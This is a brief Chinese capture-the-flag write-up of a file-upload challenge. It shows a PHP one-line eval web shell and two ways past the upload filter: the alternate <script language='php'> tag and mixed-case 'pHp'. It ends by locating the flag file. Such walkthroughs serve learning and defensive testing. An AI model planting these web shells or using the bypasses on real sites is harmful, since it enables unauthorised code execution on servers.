=============================
个人收获:
1.PHP标记的不同写法
2.PHP标记被过滤可以试试大小写
==============================
不知道为什么写这篇文章的时候CSDN的服务器出现问题一直无法上传图片,索性就不传了,因为这题挺简单的。
题目开始是说让我们随便上传文件,那么我们找个一句话直接上传
<?php
@eval($_POST["code"]);
?>然后会出现上传成功!
我点下那个文字就能调转到我们上传的文件地址
显示如下内容
eval($_POST['a']); ?>发下<php被过滤了,那我们采用别的php标记写法
<script language="php">
@eval($_POST["code"]);
</script>然后再次上传出现菜刀这个提示
HTTP /1.1 200ok
Server: nginx/1.10.2
......(此处省去其他头部信息)
<script language="">
@eval($_POST["code"]);
</script>
我们发下php被过滤掉了那我们试试大小写
<script language="pHp">
@eval($_POST["code"]);
</script>然后能就能成功解析 找到
然后flag 就在/var/www/html/flag.php
